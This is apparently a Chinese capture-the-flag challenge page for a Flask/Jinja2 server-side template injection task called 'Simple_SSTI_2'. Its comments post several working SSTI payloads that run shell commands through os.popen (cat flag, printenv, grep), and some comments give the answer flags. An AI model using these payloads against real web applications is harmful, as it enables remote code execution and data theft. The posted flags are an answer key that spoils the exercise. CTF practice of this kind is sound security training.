Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15849
提  示:
描  述:
Simple_SSTI_2
评论
hao7 2月前

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1

Fusang 2月前

?flag={{''.__class__.__base__.__subclasses__()[425].__init__.__globals__['os'].popen('cat flag').read()}}

回复 0

超爱西西鸭 4月前

/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

回复 1

pettter 5月前

?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}

回复 0

不会写代码的菜鸟 6月前

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 5月前

因为没有import os,os是未定义的

回复 3

q1152874733 6月前

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 0

Royic 7月前

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0

sz007 7月前

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0

如你所愿 7月前

flag{5566f3c3cc3821f4a768384d2a387aae}

回复 0

109349 7月前

flag{2682096b09e88fe5f1faee731c0d36d7}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

rootkits 攻破了该题 7小时前
ckasdfg 攻破了该题 3天前
18283162726 攻破了该题 6天前
854396873 攻破了该题 7天前
2795126541 攻破了该题 7天前
Dou豆百万 攻破了该题 7天前
z723622533 攻破了该题 7天前
ssoocc 攻破了该题 8天前
aaa123bbb 攻破了该题 8天前
faasfagasg 攻破了该题 9天前
primaryboy 攻破了该题 9天前
zzz666 攻破了该题 11天前
Timeo 攻破了该题 13天前
biandanjun 攻破了该题 14天前
kk2024 攻破了该题 14天前
luogen 攻破了该题 15天前
rookiee 攻破了该题 16天前
Beenlia 攻破了该题 16天前
Jie666 攻破了该题 17天前
chaojiikun 攻破了该题 17天前
问题反馈